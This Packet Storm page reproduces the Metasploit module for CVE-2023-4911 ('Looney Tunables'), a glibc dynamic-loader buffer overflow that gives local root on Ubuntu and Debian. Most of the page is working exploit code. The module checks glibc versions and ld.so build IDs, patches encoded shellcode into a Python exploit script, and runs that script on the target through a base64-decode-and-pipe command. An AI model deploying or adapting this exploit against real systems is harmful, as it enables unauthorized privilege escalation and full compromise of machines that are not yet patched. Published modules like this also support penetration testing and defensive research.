what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Glibc Tunables Privilege Escalation

Glibc Tunables Privilege Escalation
Posted Dec 21, 2023
Authored by Blasty, jheysel-r7, Qualys Threat Research Unit | Site metasploit.com

A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. It has been dubbed Looney Tunables. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when launching binaries with SUID permission to execute code in the context of the root user. This Metasploit module targets glibc packaged on Ubuntu and Debian. Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911 however this module does not target them.

tags | exploit, overflow, local, root
systems | linux, debian, fedora, ubuntu
advisories | CVE-2023-4911
SHA-256 | e48ab23fe12076a6f076606de74abf4141a72444bfb88e5c9ea8bf73a3f2b891

Glibc Tunables Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

# includes: is_root?
include Msf::Post::Linux::Priv
# includes: kernel_release
include Msf::Post::Linux::Kernel
# include: get_sysinfo
include Msf::Post::Linux::System
# includes writable?, upload_file, upload_and_chmodx, exploit_data, cd
include Msf::Post::File
# includes register_files_for_cleanup
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

BUILD_IDS = {
'69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
'3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
'a99db3715218b641780b04323e4ae5953d68a927' => 561,
'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
'61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
'9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
'956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
}
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',
'Description' => %q{
A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES
environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when
launching binaries with SUID permission to execute code in the context of the root user.

This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:

Ubuntu:
2.35-0ubuntu3.4 > 2.35
2.37-0ubuntu2.1 > 2.37
2.38-1ubuntu6 > 2.38

Debian:
2.31-13-deb11u7 > 2.31
2.36-9-deb12u3 > 2.36

Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911
however this module does not target them.
},
'Author' => [
'Qualys Threat Research Unit', # discovery
'blasty <peter@haxx.in>', # PoC
'jheysel-r7' # msf module
],
'References' => [
['CVE', '2023-4911'],
['URL', 'https://haxx.in/files/gnu-acme.py'],
['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],
['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],
['URL', 'https://ubuntu.com/security/CVE-2023-4911']
],
'License' => MSF_LICENSE,
'Platform' => [ 'linux', 'unix' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PrependSetresgid' => true,
'PrependSetresuid' => true,
'WfsDelay' => 600
},
'DisclosureDate' => '2023-10-03',
'Notes' => {
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
register_advanced_options([
OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
])
end

def find_exec_program
%w[python python3].select(&method(:command_exists?)).first
rescue StandardError => e
fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")
end

def check
glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+\(\w+\s+GLIBC\s+(\S+)\)/)&.flatten&.first
return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version

sysinfo = get_sysinfo
case sysinfo[:distro]
when 'ubuntu'
# Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility
test_version = glibc_version.gsub(/-\d+ubuntu/, '.')
if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||
Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||
Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))
return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")
end
when 'debian'
# Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility
test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')
if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||
Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))
return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")
end
else
return CheckCode::Unknown('The module has not been tested against this Linux distribution')
end
CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")
end

def check_ld_so_build_id
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
if !command_exists?('file')
print_warning('Unable to locate the `file` command ti order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')
return
end
file_cmd_output = ''

# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
# defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.
sysinfo = get_sysinfo
case sysinfo[:distro]
when 'ubuntu'
if command_exists?('ldconfig')
file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')
end
when 'debian'
file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')
else
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
end

if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
build_id = Regexp.last_match(1)
if BUILD_IDS.keys.include?(build_id)
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
else
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
end
else
print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')
end
end

def exploit
fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?

python_binary = find_exec_program
fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary
vprint_status("Using '#{python_binary}' to run the exploit")

check_ld_so_build_id

# The python script assumes the working directory is the one we can write to.
cd(datastore['WritableDir'])
shell_code = payload.encoded.unpack('H*').first

exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')
exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)
exploit_data = exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))

# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
if output.blank?
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
else
print_line(output)
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close